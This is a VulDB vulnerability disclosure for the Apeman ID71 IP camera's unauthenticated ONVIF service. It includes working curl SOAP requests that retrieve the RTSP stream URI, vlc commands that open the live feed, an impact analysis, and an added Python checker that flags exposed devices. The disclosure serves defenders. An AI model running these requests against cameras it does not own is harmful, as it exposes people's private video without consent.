| Title | Apeman IP CAMERA Model ID71 sysversion: 218.53.203.117 Unauthenticated RTSP Stream |
|---|
| Description | The device exposes an ONVIF service on port 10080. ONVIF (Open Network Video Interface Forum) is a common SOAP-based API for discovering and controlling IP cameras (profiles, stream URIs, PTZ, etc.). Because the ONVIF endpoints on this device do not require authentication, an attacker on the same network can enumerate media profiles and retrieve the RTSP URI for live video — then connect directly to the camera stream (no credentials needed).
How we discovered the stream (commands & output)
Query ONVIF for profiles:
curl -s -X POST http://192.168.1.151:10080/onvif/device_service \
-H 'Content-Type: application/soap+xml; charset=utf-8' \
-H 'SOAPAction: "http://www.onvif.org/ver10/media/wsdl/GetProfiles"' \
-d '
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsdl="http://www.onvif.org/ver10/media/wsdl">
<soap:Header/>
<soap:Body>
<wsdl:GetProfiles/>
</soap:Body>
</soap:Envelope>
' | xmllint --format -
Sample (abridged) response shows available profile tokens:
<trt:GetProfilesResponse>
<trt:Profiles fixed="true" token="PROFILE_000">
<tt:Name>PROFILE_000</tt:Name>
<tt:VideoSourceConfiguration token="V_SRC_000"> ...
Request the stream URI for the profile token:
curl -s -X POST http://192.168.1.151:10080/onvif/device_service \
-H 'Content-Type: application/soap+xml; charset=utf-8' \
-H 'SOAPAction: "http://www.onvif.org/ver10/media/wsdl/GetStreamUri"' \
-d '
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsdl="http://www.onvif.org/ver10/media/wsdl">
<soap:Header/>
<soap:Body>
<wsdl:GetStreamUri>
<wsdl:ProfileToken>PROFILE_000</wsdl:ProfileToken>
</wsdl:GetStreamUri>
</soap:Body>
</soap:Envelope>
' | xmllint --format -
Sample response (abridged):
<trt:GetStreamUriResponse>
<trt:MediaUri>
<tt:Uri>rtsp://192.168.1.151:10554/udp/av0_0</tt:Uri>
<tt:InvalidAfterConnect>false</tt:InvalidAfterConnect>
<tt:Timeout>PT60S</tt:Timeout>
</trt:MediaUri>
</trt:GetStreamUriResponse>
Connect to the stream (no credentials required):
# UDP
vlc rtsp://192.168.1.151:10554/udp/av0_0
# TCP
vlc rtsp://192.168.1.151:10554/tcp/av0_0
If successful, the attacker sees the live camera video feed.
Why this is a vulnerability
- Unauthenticated disclosure of live video: ONVIF endpoints return RTSP URIs without requiring authentication; RTSP stream access is therefore open to anyone who can reach the device.
- Sensitive exposure: Video streams can contain PII, facility layouts, worker activity, physical access events, or other sensitive surveillance content.
- Ease of exploitation: Exploitation requires only network access and simple SOAP requests; no special tooling or credentials are needed.
Impact
- Confidentiality: High — live video and recorded streams may reveal sensitive personal or business information (people, processes, secure areas).
- Integrity: Low–Medium — while reading the stream is the primary issue, some ONVIF implementations also allow PTZ control or configuration via unauthenticated endpoints, which could let an attacker reposition cameras or alter recordings.
- Availability: Low — an attacker could attempt to flood the stream or change settings, but availability impact is typically limited compared to confidentiality.
- Exploitability: High — trivial SOAP POSTs and an RTSP client are sufficient when the device is reachable.
Vendor status:
The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful.
From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line.
Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums). |
|---|
| Source | ⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/RTSP/RTSP_Unauthenticated.md |
|---|
| User | juliourena (UID 90207) |
|---|
| Submission | 04/10/2025 19:00 (8 months ago) |
|---|
| Moderation | 16/10/2025 13:29 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 328798 [Apeman ID71 218.53.203.117 ONVIF Service /onvif/device_service weak authentication] |
|---|
| Points | 20 |
|---|
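For device owners checking their own cameras: the sketch below classifies the reply a camera gives to the GetProfiles and GetStreamUri requests from the description when they are sent without credentials. It is an added example, not part of the original submission; the function name `classify_onvif_reply` is hypothetical, and the sample replies are constructed from the abridged output above with the standard SOAP 1.2 and ONVIF namespaces filled in.

```python
import xml.etree.ElementTree as ET

NS = {  # standard SOAP 1.2 and ONVIF namespaces
    "s": "http://www.w3.org/2003/05/soap-envelope",
    "trt": "http://www.onvif.org/ver10/media/wsdl",
    "tt": "http://www.onvif.org/ver10/schema",
}

def classify_onvif_reply(http_status, body):
    """Classify the reply to a media request that carried NO credentials."""
    if http_status == 401:  # HTTP-level authentication challenge
        return "auth-required", []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "unparseable", []
    fault = root.find(".//s:Fault", NS)
    if fault is not None:
        # ONVIF reports missing credentials with the subcode ter:NotAuthorized
        codes = [v.text or "" for v in fault.iterfind(".//s:Value", NS)]
        denied = any(c.endswith("NotAuthorized") for c in codes)
        return ("auth-required" if denied else "fault"), codes
    uris = [u.text for u in root.iterfind(".//trt:MediaUri/tt:Uri", NS) if u.text]
    tokens = [p.get("token") for p in root.iterfind(".//trt:Profiles", NS) if p.get("token")]
    if uris or tokens:  # media data handed to an anonymous caller
        return "exposed", uris + tokens
    return "no-media-data", []

# Constructed samples: the page's abridged replies with namespaces filled in,
# and the fault a device that enforces authentication would send instead.
_ENV = '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" ' \
       'xmlns:trt="http://www.onvif.org/ver10/media/wsdl" ' \
       'xmlns:tt="http://www.onvif.org/ver10/schema" ' \
       'xmlns:ter="http://www.onvif.org/ver10/error"><s:Body>%s</s:Body></s:Envelope>'
STREAM_URI_REPLY = _ENV % ("<trt:GetStreamUriResponse><trt:MediaUri>"
    "<tt:Uri>rtsp://192.168.1.151:10554/udp/av0_0</tt:Uri>"
    "</trt:MediaUri></trt:GetStreamUriResponse>")
PROFILES_REPLY = _ENV % ('<trt:GetProfilesResponse><trt:Profiles fixed="true" '
    'token="PROFILE_000"><tt:Name>PROFILE_000</tt:Name></trt:Profiles></trt:GetProfilesResponse>')
DENIED_REPLY = _ENV % ("<s:Fault><s:Code><s:Value>s:Sender</s:Value><s:Subcode>"
    "<s:Value>ter:NotAuthorized</s:Value></s:Subcode></s:Code></s:Fault>")

if __name__ == "__main__":
    for name, reply in [("stream", STREAM_URI_REPLY), ("profiles", PROFILES_REPLY), ("denied", DENIED_REPLY)]:
        print(name, classify_onvif_reply(200, reply))
```

An `exposed` verdict on a reply to a credential-less request is the condition this report describes; a device that enforces ONVIF authentication answers with HTTP 401 or a `ter:NotAuthorized` fault instead.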